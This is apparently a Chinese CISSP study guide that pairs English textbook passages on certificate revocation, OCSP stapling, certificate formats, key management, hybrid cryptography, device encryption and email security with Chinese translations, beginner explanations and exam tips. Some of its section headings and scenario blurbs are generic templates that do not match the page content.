程序 程序是一步一步怎么做。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
身份 身份是主体在系统中的标识。
学习单元 26 / PDF P452

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

The certificate was compromised (for example, the certificate owner accidentally gave away the private key). The certificate was erroneously issued (for example, the CA mistakenly issued a certificate without proper verification). The details of the certificate changed (for example, the subject's name changed). The security association changed (for example, the subject is no longer employed by the organization sponsoring the certificate). The revocation request grace period is the maximum response time within which a CA will perform any requested revocation. This is defined in the Certificate Practice Statement (CPS).

The CPS states the practices a CA employs when issuing or managing certificates. You can use three techniques to verify the authenticity of certificates and identify revoked certificates: Certificate Revocation Lists Certificate revocation lists (CRLs) are maintained by the various certificate authorities and contain the serial numbers of certificates that have been issued by a CA and that have been revoked, along with the date and time the revocation went into effect.

The major disadvantage to certificate revocation lists is that they must be downloaded and cross-referenced periodically, introducing a period of latency between the time a certificate is revoked and the time end users are notified of the revocation. Online Certificate Status Protocol (OCSP) This protocol eliminates the latency inherent in the use of certificate revocation lists by providing a means for real-time certificate verification. When a client receives a certificate, it sends an OCSP request to the CA's OCSP server. The server then responds with a status of good, revoked, or unknown. The browser uses this information to determine whether the certificate is valid.

Certificate Stapling The primary issue with OCSP is that it places a significant burden on the OCSP servers operated by certificate authorities. These servers must process requests from every single visitor to a website or

中文直译 / 整理

证书已泄露(例如,证书所有者意外泄露了私钥)。 证书被错误签发(例如,CA 在未进行适当验证的情况下错误地签发了证书)。 证书的详细信息发生了变化(例如,主题名称发生了更改)。 安全关联发生了变化(例如,主题不再受雇于赞助该证书的组织)。 吊销请求的宽限期是指 CA 执行任何请求的吊销操作的最大响应时间。 这在 证书实践声明(CPS) 中定义。 CPS 规定了 CA 在签发或管理证书 时所采用的实践。 您可以使用三种技术来验证证书的真实性并识别已吊销的证书: 证书吊销列表 证书吊销列表(CRL)由各个证书颁发机构维护,其中包含由 CA 签发且已被吊销的证书的序列号,以及吊销生效的日期和时间。 证书吊销 列表的主要缺点是必须定期下载并交叉引用,这会在证书被吊销与最终用户收 到吊销通知之间引入一段延迟。 在线证书状态协议(OCSP) 该协议通过提供实时证书验证手段,消除了使用 证书吊销列表所固有的延迟。 当客户端收到证书时,它会向CA的OCSP服务器 发送OCSP请求。 服务器随后返回“有效”、“吊销”或“未知”状态。 浏览 器利用此信息来确定证书是否有效。

证书状态 stapling OCSP 的主要问题是,它给证书颁发机构运营的 OCSP 服 务器带来了沉重负担。 这些服务器必须处理每个网站或

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

证书、签名、强认证常支持真实性。

证书不是密钥本身,而是身份与公钥的可信绑定。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
学习单元 27 / PDF P453

第 453 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

other user of a digital certificate, verifying that the certificate is valid and not revoked. Certificate stapling is an extension to the Online Certificate Status Protocol that relieves some of the burden placed on certificate authorities by the original protocol. In the absence of OCSP, when a user visits a website and initiates a secure connection, the web server sends its digital certificate to the user's browser. The user's browser would normally then be responsible for contacting an OCSP server to verify the certificate's validity.

In certificate stapling, the web server contacts the OCSP server itself and receives a signed and timestamped response from the OCSP server, which it then attaches, or staples, to the digital certificate. Then, when a user requests a secure web connection, the web server sends the digital certificate with the stapled OCSP response to the user's browser. The user's browser then verifies whether the certificate is authentic and also validates that the stapled OCSP response is genuine and recent. Because the CA signed the OCSP response, the user's browser knows that it is from the CA, and the timestamp provides the user's browser with assurance that the CA recently validated the certificate.

From there, communication may continue as normal. The time savings come when the next user visits the website. The web server can simply reuse the stapled certificate without recontacting the OCSP server. As long as the timestamp is recent enough, the user's browser will accept the stapled certificate without needing to contact the CA's OCSP server again. It's common to have stapled certificates with a validity period of 24 hours. That reduces the burden on an OCSP server from handling one request per user over the course of a day, which could be millions of requests, to handling one request per certificate per day. That's a tremendous reduction.

Certificate Formats Digital certificates are stored in files, and those files come in a variety of formats, both binary and text-based: The most common binary format is the Distinguished Encoding Rules (DER) format. DER certificates are normally stored in files with the .der, .crt, or .cer extension.

中文直译 / 整理

数字证书的其他用户发出的请求,以验证证书是否有效且未被吊销。 证书状态stapling 是在线证书状态协议的一个扩展,它减轻了原始协议对证 书颁发机构造成的部分负担。 在没有 OCSP 的情况下,当用户访问网站并建 立安全连接时,Web 服务器会将其数字证书发送给用户的浏览器。 用户的浏 览器通常需要联系 OCSP 服务器以验证证书的有效性。 在证书状态 stapling 中,Web 服务器自行联系 OCSP 服务器,并从 OCSP 服 务器接收一个经过签名和带时间戳的响应,然后将该响应附加(即 stapling) 到数字证书上。 随后,当用户请求安全的 Web 连接时,Web 服务器会将带有 stapled OCSP 响应的数字证书发送给用户的浏览器。 用户的浏览器随后验证 证书是否真实,并确认 stapled 的 OCSP 响应是否真实且及时。 由于 CA 签署 了 OCSP 响应,用户的浏览器知道该响应来自 CA,而时间戳则向用户的浏览 器保证 CA 最近已验证了该证书。 此后,通信即可正常进行。 时间节省发生在下一个用户访问网站时。 Web服务器可以简单地重用已绑定的 证书,而无需重新联系OCSP服务器。

只要时间戳足够新,用户的浏览器就会 接受该绑定证书,而无需再次联系CA的OCSP服务器。 通常,绑定证书的有效 期为24小时。 这将OCSP服务器的负担从每天为每个用户处理一次请求(可能 达到数百万次请求)降低为每天为每个证书处理一次请求。 这是一个巨大的减 少。 证书格式 数字证书存储在文件中,这些文件有多种格式,包括二进制和基于文本的格 式: 最常见的二进制格式是区分编码规则(DER)格式。 DER 证书通常存储在 扩展名为 .der、.crt 或 .cer 的文件中。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 453 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

证书不是密钥本身,而是身份与公钥的可信绑定。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
学习单元 28 / PDF P454

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

The Privacy-Enhanced Mail (PEM) certificate format is an ASCII text version of the DER format. PEM certificates are normally stored in files with the .pem or .crt extension. You may have picked up on the fact that the .crt file extension is used for both binary DER files and text PEM files. That's very confusing. You should remember that you can't tell whether a CRT certificate is binary or text without actually looking at the contents of the file. The Personal Information Exchange (PFX) format is commonly used by Windows systems. PFX certificates may be stored in binary form, using either .pfx or .p12 file extensions.

Windows systems also use P7B certificates, which are stored in ASCII text format using the .p7b file extension. Table 7.2 provides a summary of certificate formats. TABLE 7.2 Digital certificate formats File format names Format File extension(s) Distinguished Encoding Rules (DER) Binary .der, .crt, .cer Privacy-Enhanced Mail (PEM) Text .pem, .crt Personal Information Exchange (PFX) Binary .pfx, .p12 P7B Text .p7b Asymmetric Key Management When working within the public key infrastructure, you must comply with several best practice requirements to maintain the security of your communications. First, choose your encryption system wisely.

As you learned earlier, “security through obscurity” is not an appropriate approach. Choose an encryption system with an algorithm in the public domain that has been thoroughly vetted by industry experts. Be wary of systems that use a “black-box”

中文直译 / 整理

隐私增强邮件(PEM)证书格式是 DER 格式的 ASCII 文本版本。 PEM 证书通常存储在扩展名为 .pem 或 .crt 的文件中。 您可能已经注意到,.crt 文件扩展名既用于二进制 DER 文件,也 用于文本 PEM 文件。 这非常令人困惑。 您应该记住,无法仅凭文件扩 展名判断 CRT 证书是二进制还是文本格式,必须实际查看文件内容才 能确定。 个人信息交换(PFX)格式通常由 Windows 系统使用。 PFX 证书可以 以二进制形式存储,使用 .pfx 或 .p12 文件扩展名。 Windows 系统还使用 P7B 证书,这些证书以 ASCII 文本格式存储,使用 .p7b 文件扩展名。 表 7.2总结了证书格式。 表 7.2数字证书格式 文件格式名称 文件格式扩展名 区分编码规则 (DER) 二进制 .der, .crt, .cer 增强隐私邮件 (PEM) Text .pem, .crt 个人身份信息交换(PFX)二进制 .pfx, .p12 P7B Text .p7b 非对称密钥管理 在公钥基础设施中工作时,您必须遵守若干最佳实践要求,以确保通信的安 全性。 首先,明智地选择您的加密系统。

正如您之前所学,‘通过隐蔽性保证安全’ 并不是一种恰当的方法。 请选择使用公有领域算法且已由行业专家彻底审查的 加密系统。 对使用“黑箱”方法的系统保持警惕。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

非对称加密:非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

证书不是密钥本身,而是身份与公钥的可信绑定。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
身份 身份是主体在系统中的标识。
学习单元 29 / PDF P455

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

approach and maintain that the secrecy of their algorithm is critical to the integrity of the cryptosystem. You must also select your keys in an appropriate manner. Use a key length that balances your security requirements with performance considerations. Also, ensure that your key is truly random. Any patterns within the key increase the likelihood that an attacker will be able to break your encryption and degrade the security of your cryptosystem. When using public key encryption, keep your private key secret. Do not, under any circumstances, allow anyone else to gain access to your private key.

Remember, allowing someone access even once permanently compromises all communications that take place (past, present, or future) using that key and allows the third party to successfully impersonate you. Retire keys when they've served a useful life. Many organizations have mandatory key rotation requirements to protect against undetected key compromise. If you don't have a formal policy that you must follow, select an appropriate interval based on the frequency with which you use your key. You might want to change your key pair every few months, if practical. Back up your key.

If you lose the file containing your private key because of data corruption, disaster, or other circumstances, you'll certainly want to have a backup available. You may want to either create your own backup or use a key escrow service that maintains the backup for you. In either case, ensure that the backup is handled in a secure manner. After all, it's just as important as your primary key file. Hardware security modules (HSMs) also provide an effective way to manage encryption keys. These hardware devices store and manage encryption keys in a secure manner that prevents humans from ever needing to work directly with the keys.

Many of them are also capable of improving the efficiency of cryptographic operations, in a process known as hardware acceleration. HSMs range in scope and complexity from very simple devices, such as the YubiKey, that store encrypted keys on a USB drive for personal use, to more complex enterprise products that reside in a data center. HSMs include tamperresistance mechanisms to prevent someone who gains physical access to the device from accessing the cryptographic material it maintains. Cloud service providers, such as Amazon and Microsoft, also offer cloud-based HSMs that provide secure key management for infrastructure-as-a-service (IaaS) cloud computing resources.

中文直译 / 整理

并坚持认为其算法的机密性对密码系统的完整性至关重要。 您还必须以适当的方式选择您的密钥。 使用平衡安全需求与性能考量的密钥长 度。 同时,确保您的密钥确实是随机的。 密钥中的任何模式都会增加攻击者破 解您加密的可能性,从而降低您的加密系统的安全性。 使用公钥加密时,请保密您的私钥。 在任何情况下,都不要允许他人访问您的 私钥。 请记住,即使仅允许他人访问一次,也会永久损害使用该密钥进行的所 有通信(过去、现在或未来),并允许第三方成功冒充您。 当密钥完成其有效生命周期后,应将其退役。 许多组织都有强制性的密钥轮换 要求,以防范未被发现的密钥泄露。 如果您没有必须遵守的正式政策,请根据 您使用密钥的频率选择适当的间隔。 如果可行,您可能希望每隔几个月更换一 次密钥对。 备份您的密钥。 如果由于数据损坏、灾难或其他情况而丢失包含私钥的文件, 您肯定希望有备份可用。 您可以选择自行创建备份,或使用密钥托管服务为您 保存备份。 无论哪种方式,都必须以安全的方式处理备份。 毕竟,它与您的主 密钥文件同样重要。 硬件安全模块(HSMs)也提供了一种有效的方式来管理加密密钥。

这些硬件设 备以安全的方式存储和管理加密密钥,从而防止人类直接接触密钥。 其中许多 还能通过一种称为硬件加速的过程提高加密操作的效率。 HSM的范围和复杂性 从非常简单的设备(例如YubiKey)到更复杂的企业级产品不等,前者将加密 密钥存储在USB驱动器上供个人使用,后者则部署在数据中心。 HSM包含防篡 改机制,以防止获得设备物理访问权限的人访问其保存的加密材料。 亚马逊和 微软等云服务提供商还提供基于云的HSM,为基础设施即服务(IaaS)云计算 资源提供安全的密钥管理。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

加密:加密把内容变成未授权者看不懂的形式。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
学习单元 30 / PDF P456

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Hybrid Cryptography You've now learned about the two major categories of cryptographic systems: symmetric and asymmetric algorithms. You've also learned about the major advantages and disadvantages of each. Chief among these are the facts that symmetric algorithms are fast but introduce key distribution challenges, and though asymmetric algorithms solve the key distribution problem, they are also computationally intensive and slow. If you're choosing between these approaches, you're forced to make a decision between convenience and speed.

Hybrid cryptography combines symmetric and asymmetric cryptography to achieve the shared secret key distribution benefits of asymmetric cryptosystems with the speed of symmetric algorithms. These approaches work by setting up an initial connection between two communicating entities using asymmetric cryptography. That connection is used for only one purpose: the exchange of a randomly generated shared secret key, known as an ephemeral key. The two parties then exchange whatever data they wish using the shared secret key with a symmetric algorithm. When the communication session ends, they discard the ephemeral key and then repeat the same process if they wish to communicate again later.

The beauty behind this approach is that it uses asymmetric cryptography for the shared secret key distribution, a task that requires the encryption of only a small amount of data. Then it switches to the faster symmetric algorithm for the vast majority of data exchanged. Transport Layer Security (TLS) is the most well-known example of hybrid cryptography, and we discuss that approach later in this chapter. Applied Cryptography Up to this point, you've learned a great deal about the foundations of cryptography, the inner workings of various cryptographic algorithms, and the use of the public key infrastructure (PKI) to distribute identity credentials using digital certificates.

You should now feel comfortable with the basics of cryptography and be prepared to move on to higher-level applications of this technology to solve everyday communications problems. In the following sections, we'll examine the use of cryptography to secure data at rest, such as that stored on portable devices, as well as data in transit,

中文直译 / 整理

混合加密 您现在已经了解了加密系统的两大类别:对称算法和非对称算法。 您也了解了 每种算法的主要优缺点。 其中最主要的是:对称算法速度快,但存在密钥分发 挑战; 而非对称算法虽然解决了密钥分发问题,但计算密集且速度较慢。 如果 您需要在这两种方法之间做出选择,就不得不在便利性与速度之间做出权衡。 混合加密结合了对称加密和非对称加密,以实现非对称加密系统在共享密钥分 发方面的优势,同时兼具对称算法的速度。 这些方法通过使用非对称加密在两 个通信实体之间建立初始连接来工作。 该连接仅用于一个目的:交换一个随机 生成的共享密钥,称为临时密钥。 随后,双方使用该共享密钥和对称算法交换 他们希望传输的任何数据。 当通信会话结束时,双方丢弃该临时密钥,若希望 再次通信,则重复相同的过程。 这种方法的精妙之处在于,它使用非对称加密进行共享密钥分发,而该任务仅 需加密少量数据; 随后切换到更快的对称算法来处理绝大部分交换的数据。 传输层安全(TLS)是混合加密最著名的示例,我们将在本章后面讨论该方法。

应用密码学 到目前为止,您已经学习了大量关于密码学基础、各种密码算法的内部工作原 理,以及如何使用公钥基础设施(PKI)通过数字证书分发身份凭证的知识。 现 在,您应当对密码学的基本原理感到熟悉,并准备好进入更高层次的应用,以 解决日常通信中的实际问题。 在以下章节中,我们将探讨使用加密技术保护静态数据(例如存储在便携设备上 的数据)以及传输中的数据。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

非对称加密:非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

CA、RA、证书、CRL、OCSP、信任链都是 PKI 高频点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
学习单元 31 / PDF P457

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

using techniques that include secure email, encrypted web communications, and networking. Portable Devices The now ubiquitous nature of laptop computers, smartphones, and tablets brings new risks to the world of computing. Those devices often contain highly sensitive information that, if lost or stolen, could cause serious harm to an organization and its customers, employees, and affiliates. For this reason, many organizations turn to encryption to protect the data on these devices in the event they are misplaced. Current versions of popular operating systems now include disk encryption capabilities that make it easy to apply and manage encryption on portable devices.

For example, Microsoft Windows includes the BitLocker and Encrypting File System (EFS) technologies, macOS includes FileVault encryption, and the VeraCrypt open source package allows the encryption of disks on Linux, Windows, and Mac systems. Trusted Platform Module Modern computers often include a specialized cryptographic component known as a Trusted Platform Module (TPM). The TPM is a chip that resides on the motherboard of the device. The TPM serves a number of purposes, including the storage and management of cryptographic keys used for full-disk encryption (FDE) solutions. The TPM provides the operating system with access to the keys only if the user successfully authenticates.

This prevents someone from removing the drive from one device and inserting it into another device to access the drive's data. A wide variety of commercial tools are available that provide added features and management capability. The major differentiators between these tools are how they protect keys stored in memory, whether they provide full-disk or volume-only encryption, and whether they integrate with hardware-based Trusted Platform Modules (TPMs) to provide added security. Any effort to select encryption software should include an analysis of how well the alternatives compete on these characteristics.

中文直译 / 整理

所使用的技术包括安全电子邮件、加密的网页通信和网络通信。 便携设备 笔记本电脑、智能手机和平板电脑的普遍存在为计算世界带来了新的风险。 这些设备通常包含高度敏感的信息,一旦丢失或被盗,可能对组织及其客户、 员工和附属机构造成严重损害。 因此,许多组织采用加密技术来保护这些设 备上的数据,以防它们被遗失。 当前主流操作系统均已内置磁盘加密功能,可轻松对便携设备应用和管理加 密。 例如,Microsoft Windows 包含 BitLocker 和加密文件系统(EFS) 技术,macOS 包含 FileVault 加密,而开源工具 VeraCrypt 则允许在 Linux、Windows 和 Mac 系统上对磁盘进行加密。 可信平台模块 现代计算机通常包含一种称为可信平台模块(TPM)的专用加密组件。 TPM 是位于设备主板上的芯片,具有多种用途,包括存储和管理用于全 磁盘加密(FDE)解决方案的加密密钥。 只有在用户成功通过身份验证后, TPM 才会向操作系统提供访问密钥的权限。 这可以防止他人将硬盘从一 台设备中取出并插入另一台设备以访问硬盘中的数据。 有多种商业工具可供选择,它们提供了额外的功能和管理能力。

这些工具的主 要区别在于它们如何保护存储在内存中的密钥、是否提供全盘加密或仅卷加密, 以及是否与基于硬件的可信平台模块(TPM)集成以提供额外安全性。 在选 择加密软件时,应分析各种替代方案在这些特性上的竞争表现。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

身份:身份是主体在系统中的标识。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 32 / PDF P458

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Don't forget about smartphones when developing your portable device encryption policy. Most major smartphone and tablet platforms include enterprise-level functionality that supports encryption of data stored on the phone. Email We have mentioned several times that security should be cost-effective. When it comes to email, simplicity is the most cost-effective option, but sometimes cryptography functions provide specific security services that you can't avoid using. Since ensuring security is also cost-effective, here are some simple rules about encrypting email: If you need confidentiality when sending an email message, encrypt the message.

If your message must maintain integrity, you must hash the message. If your message needs authentication, integrity, and/or nonrepudiation, you should digitally sign the message. If your message requires confidentiality, integrity, origin authentication, and nonrepudiation, you should encrypt and digitally sign the message. It is always the responsibility of the sender to put proper mechanisms in place to ensure that the security (that is, confidentiality, integrity, authenticity, and nonrepudiation) of a message or transmission is maintained. The coverage of email in this chapter focuses on the use of cryptography to provide secure communications between two parties.

You'll find more coverage of email security topics in Chapter 12, “Secure Communications and Network Attacks.” One of the most in-demand applications of cryptography is encrypting and signing email messages. Until recently, encrypted email required the use of

中文直译 / 整理

在制定便携设备加密策略时,不要忘记智能手机。 大多数主要的智能手 机和平板电脑平台都包含企业级功能,支持对手机上存储的数据进行加密。 电子邮件 我们多次提到,安全性应当具有成本效益。 对于电子邮件而言,简单性是最具 成本效益的选择,但有时加密功能能提供你无法回避的特定安全服务。 由于确 保安全性同样具有成本效益,以下是关于加密电子邮件的一些简单规则: 如果发送电子邮件时需要机密性,请对邮件内容进行加密。 如果您的邮件必须保持完整性,则必须对邮件进行哈希处理。 如果您的邮件需要身份验证、完整性一个或多个属性,您应当对邮件进行数 字签名。 如果您的邮件需要机密性、完整性、来源身份验证和不可否认性性,您应当对邮 件进行加密并进行数字签名。 发送方始终有责任采取适当的机制,以确保消息或传输的安全性(即保密 性、完整性、真实性和不可否认性性)得到维护。 本章对电子邮件的覆盖重点在于使用密码学在双方之间提供安全通信。 您将在第12章“安全通信与网络攻击”中找到更多关于电子邮件安全主题 的介绍。 密码学最广泛的应用之一是加密和签名电子邮件。 直到最近,加密电子邮件仍需 使用

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

证书、签名、强认证常支持真实性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
